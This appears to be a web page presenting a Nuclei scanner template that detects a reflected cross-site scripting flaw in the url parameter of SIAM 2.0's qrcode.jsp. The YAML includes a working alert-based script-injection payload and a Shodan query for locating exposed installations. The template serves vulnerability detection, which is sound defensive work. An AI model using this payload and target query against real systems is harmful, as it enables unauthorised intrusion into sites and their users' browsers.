Skip to content

SIAM 2.0 - Cross-Site Scripting

ID: siam-xss

Severity: medium

Author: 3th1c_yuk1

Tags: siam,convite,xss

A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the SIAM Invitation application. The url parameter of the qrcode.jsp page does not properly sanitize user input, allowing the injection and execution of malicious scripts in the browser.

id: siam-xss
info:
name: SIAM 2.0 - Cross-Site Scripting
author: 3th1c_yuk1
severity: medium
description: |
A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the SIAM Invitation application. The url parameter of the qrcode.jsp page does not properly sanitize user input, allowing the injection and execution of malicious scripts in the browser.
reference: |
- https://vuldb.com/?submit.496171
- https://ftp.ogma.in/blog/understanding-and-mitigating-cve-2025-1359-siam-2-0-vulnerabilities
metadata:
verified: true
max-request: 1
shodan-query: html:"siam-convite"
tags: siam,convite,xss
http:
- method: GET
path:
- "{{BaseURL}}/siam-convite/qrcode.jsp?url=1%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain)>'
- 'SIAM</a>'
condition: and
- type: word
part: content_type
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a004630440220190d89192135dd69e3ab5acd7f13a46643138bf163a41f81d87c520da13f3222022036e6dcb547feb14322064c609502a905401ed07d0cf33083bc07ffec868d78fd:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/siam-xss.yaml"

View on Github